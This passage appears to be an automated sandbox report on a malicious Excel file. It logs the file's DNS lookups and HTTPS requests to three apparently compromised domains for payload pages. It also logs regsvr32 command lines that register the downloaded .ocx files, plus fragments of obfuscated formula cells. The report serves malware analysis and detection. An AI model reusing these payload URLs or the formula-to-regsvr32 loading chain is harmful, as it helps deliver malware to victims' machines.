8,5,=CHAR(Sbrbuk1!J25)

                                                                                                                                                            4,9,=CHAR(Sbrbuk1!N29)
11,2,L

                                                                                                                                                            Network Behavior

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Dec 2, 2021 14:43:57.404135942 CET49743443192.168.2.3108.179.192.98
                                                                                                                                                            Dec 2, 2021 14:43:57.404167891 CET44349743108.179.192.98192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:57.404252052 CET49743443192.168.2.3108.179.192.98
                                                                                                                                                            Dec 2, 2021 14:43:57.405126095 CET49743443192.168.2.3108.179.192.98
                                                                                                                                                            Dec 2, 2021 14:43:57.405145884 CET44349743108.179.192.98192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:57.699938059 CET44349743108.179.192.98192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:57.700098038 CET49743443192.168.2.3108.179.192.98
                                                                                                                                                            Dec 2, 2021 14:43:57.707865000 CET49743443192.168.2.3108.179.192.98
                                                                                                                                                            Dec 2, 2021 14:43:57.707880974 CET44349743108.179.192.98192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:57.708167076 CET44349743108.179.192.98192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:57.708250999 CET49743443192.168.2.3108.179.192.98
                                                                                                                                                            Dec 2, 2021 14:43:57.708753109 CET49743443192.168.2.3108.179.192.98
                                                                                                                                                            Dec 2, 2021 14:43:57.748871088 CET44349743108.179.192.98192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:58.877183914 CET44349743108.179.192.98192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:58.877271891 CET44349743108.179.192.98192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:58.877453089 CET49743443192.168.2.3108.179.192.98
                                                                                                                                                            Dec 2, 2021 14:43:58.877516031 CET49743443192.168.2.3108.179.192.98
                                                                                                                                                            Dec 2, 2021 14:43:58.879661083 CET49743443192.168.2.3108.179.192.98
                                                                                                                                                            Dec 2, 2021 14:43:58.879682064 CET44349743108.179.192.98192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:58.879750967 CET49743443192.168.2.3108.179.192.98
                                                                                                                                                            Dec 2, 2021 14:43:58.879812956 CET49743443192.168.2.3108.179.192.98
                                                                                                                                                            Dec 2, 2021 14:43:58.926947117 CET49744443192.168.2.3103.28.36.171
                                                                                                                                                            Dec 2, 2021 14:43:58.927005053 CET44349744103.28.36.171192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:58.927098989 CET49744443192.168.2.3103.28.36.171
                                                                                                                                                            Dec 2, 2021 14:43:58.928210974 CET49744443192.168.2.3103.28.36.171
                                                                                                                                                            Dec 2, 2021 14:43:58.928256989 CET44349744103.28.36.171192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:59.384181023 CET44349744103.28.36.171192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:59.384433031 CET49744443192.168.2.3103.28.36.171
                                                                                                                                                            Dec 2, 2021 14:43:59.396131039 CET49744443192.168.2.3103.28.36.171
                                                                                                                                                            Dec 2, 2021 14:43:59.396164894 CET44349744103.28.36.171192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:59.396559000 CET44349744103.28.36.171192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:59.396641016 CET49744443192.168.2.3103.28.36.171
                                                                                                                                                            Dec 2, 2021 14:43:59.397243023 CET49744443192.168.2.3103.28.36.171
                                                                                                                                                            Dec 2, 2021 14:43:59.440921068 CET44349744103.28.36.171192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:03.795022964 CET44349744103.28.36.171192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:03.795097113 CET44349744103.28.36.171192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:03.795111895 CET49744443192.168.2.3103.28.36.171
                                                                                                                                                            Dec 2, 2021 14:44:03.795149088 CET49744443192.168.2.3103.28.36.171
                                                                                                                                                            Dec 2, 2021 14:44:03.795309067 CET49744443192.168.2.3103.28.36.171
                                                                                                                                                            Dec 2, 2021 14:44:03.795324087 CET44349744103.28.36.171192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:03.795348883 CET49744443192.168.2.3103.28.36.171
                                                                                                                                                            Dec 2, 2021 14:44:03.795376062 CET49744443192.168.2.3103.28.36.171
                                                                                                                                                            Dec 2, 2021 14:44:03.980844975 CET49745443192.168.2.3162.241.2.78
                                                                                                                                                            Dec 2, 2021 14:44:03.980881929 CET44349745162.241.2.78192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:03.980956078 CET49745443192.168.2.3162.241.2.78
                                                                                                                                                            Dec 2, 2021 14:44:03.981595993 CET49745443192.168.2.3162.241.2.78
                                                                                                                                                            Dec 2, 2021 14:44:03.981606007 CET44349745162.241.2.78192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:04.283319950 CET44349745162.241.2.78192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:04.283541918 CET49745443192.168.2.3162.241.2.78
                                                                                                                                                            Dec 2, 2021 14:44:04.293576956 CET49745443192.168.2.3162.241.2.78
                                                                                                                                                            Dec 2, 2021 14:44:04.293592930 CET44349745162.241.2.78192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:04.293803930 CET44349745162.241.2.78192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:04.293899059 CET49745443192.168.2.3162.241.2.78
                                                                                                                                                            Dec 2, 2021 14:44:04.295006037 CET49745443192.168.2.3162.241.2.78
                                                                                                                                                            Dec 2, 2021 14:44:04.340869904 CET44349745162.241.2.78192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:05.743120909 CET44349745162.241.2.78192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:05.743261099 CET49745443192.168.2.3162.241.2.78
                                                                                                                                                            Dec 2, 2021 14:44:05.743593931 CET44349745162.241.2.78192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:05.743649960 CET44349745162.241.2.78192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:05.743665934 CET49745443192.168.2.3162.241.2.78
                                                                                                                                                            Dec 2, 2021 14:44:05.743693113 CET49745443192.168.2.3162.241.2.78
                                                                                                                                                            Dec 2, 2021 14:45:43.473086119 CET49745443192.168.2.3162.241.2.78
                                                                                                                                                            Dec 2, 2021 14:45:43.473129988 CET49745443192.168.2.3162.241.2.78

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Dec 2, 2021 14:43:57.383786917 CET5415453192.168.2.38.8.8.8
                                                                                                                                                            Dec 2, 2021 14:43:57.401707888 CET53541548.8.8.8192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:43:58.900121927 CET5280653192.168.2.38.8.8.8
                                                                                                                                                            Dec 2, 2021 14:43:58.922553062 CET53528068.8.8.8192.168.2.3
                                                                                                                                                            Dec 2, 2021 14:44:03.815543890 CET5391053192.168.2.38.8.8.8
                                                                                                                                                            Dec 2, 2021 14:44:03.978220940 CET53539108.8.8.8192.168.2.3

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                            Dec 2, 2021 14:43:57.383786917 CET192.168.2.38.8.8.80xbbe0Standard query (0)greenflag.esp.brA (IP address)IN (0x0001)
                                                                                                                                                            Dec 2, 2021 14:43:58.900121927 CET192.168.2.38.8.8.80xc137Standard query (0)noithat117.vnA (IP address)IN (0x0001)
                                                                                                                                                            Dec 2, 2021 14:44:03.815543890 CET192.168.2.38.8.8.80x9f4dStandard query (0)playsis.com.brA (IP address)IN (0x0001)

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                            Dec 2, 2021 14:43:57.401707888 CET8.8.8.8192.168.2.30xbbe0No error (0)greenflag.esp.br108.179.192.98A (IP address)IN (0x0001)
                                                                                                                                                            Dec 2, 2021 14:43:58.922553062 CET8.8.8.8192.168.2.30xc137No error (0)noithat117.vn103.28.36.171A (IP address)IN (0x0001)
                                                                                                                                                            Dec 2, 2021 14:44:03.978220940 CET8.8.8.8192.168.2.30x9f4dNo error (0)playsis.com.br162.241.2.78A (IP address)IN (0x0001)

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • greenflag.esp.br
                                                                                                                                                            • noithat117.vn
                                                                                                                                                            • playsis.com.br

                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.349743108.179.192.98443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2021-12-02 13:43:57 UTC0OUTGET /yuINdRbM/tiynh.html HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                            Host: greenflag.esp.br
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2021-12-02 13:43:58 UTC0INHTTP/1.1 200 OK
                                                                                                                                                            Date: Thu, 02 Dec 2021 13:43:57 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.349744103.28.36.171443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2021-12-02 13:43:59 UTC0OUTGET /TSh7GBeIR/tiynh.html HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                            Host: noithat117.vn
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2021-12-02 13:44:03 UTC0INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Date: Thu, 02 Dec 2021 13:44:03 GMT
                                                                                                                                                            Server: LiteSpeed
                                                                                                                                                            Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.349745162.241.2.78443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2021-12-02 13:44:04 UTC1OUTGET /qJSL1BN5V/tiynh.html HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                            Host: playsis.com.br
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2021-12-02 13:44:05 UTC1INHTTP/1.1 200 OK
                                                                                                                                                            Date: Thu, 02 Dec 2021 13:44:04 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                                            Code Manipulations

                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            Analysis Process: EXCEL.EXE PID: 2256 Parent PID: 744

                                                                                                                                                            General

                                                                                                                                                            Start time:14:43:52
                                                                                                                                                            Start date:02/12/2021
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                            Imagebase:0xdb0000
                                                                                                                                                            File size:27110184 bytes
                                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: regsvr32.exe PID: 2276 Parent PID: 2256

                                                                                                                                                            General

                                                                                                                                                            Start time:14:44:06
                                                                                                                                                            Start date:02/12/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
                                                                                                                                                            Imagebase:0x830000
                                                                                                                                                            File size:20992 bytes
                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: regsvr32.exe PID: 3108 Parent PID: 2256

                                                                                                                                                            General

                                                                                                                                                            Start time:14:44:06
                                                                                                                                                            Start date:02/12/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
                                                                                                                                                            Imagebase:0x830000
                                                                                                                                                            File size:20992 bytes
                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Analysis Process: regsvr32.exe PID: 4340 Parent PID: 2256

                                                                                                                                                            General

                                                                                                                                                            Start time:14:44:07
                                                                                                                                                            Start date:02/12/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
                                                                                                                                                            Imagebase:0x830000
                                                                                                                                                            File size:20992 bytes
                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Chronological Activities

                                                                                                                                                            Disassembly

                                                                                                                                                            Code Analysis

                                                                                                                                                            Reset < >

                                                                                                                                                              Analysis Process: EXCEL.EXE PID: 2256 Parent PID: 744 EXCEL.EXECOMMON

                                                                                                                                                              Executed Functions

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 16780CEC, Relevance: 1.3, Instructions: 1253COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000003.325048483.0000000016780000.00000004.00000001.sdmp, Offset: 16780000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_3_16780000_EXCEL.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cd88576db7afc3be1d09f21b8061a774f59680cc6d7977ea9b51099b72219a7e
                                                                                                                                                              • Instruction ID: 90b8dd9ad16266005b08a205c15016071f4e90ca27d6648909759a7c50abd618
                                                                                                                                                              • Opcode Fuzzy Hash: cd88576db7afc3be1d09f21b8061a774f59680cc6d7977ea9b51099b72219a7e
                                                                                                                                                              • Instruction Fuzzy Hash: 75D1FC6694E7C24FD7138B705CB52A07FB16E27228B0E86DBC4C4CF5B3E259584AC362
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%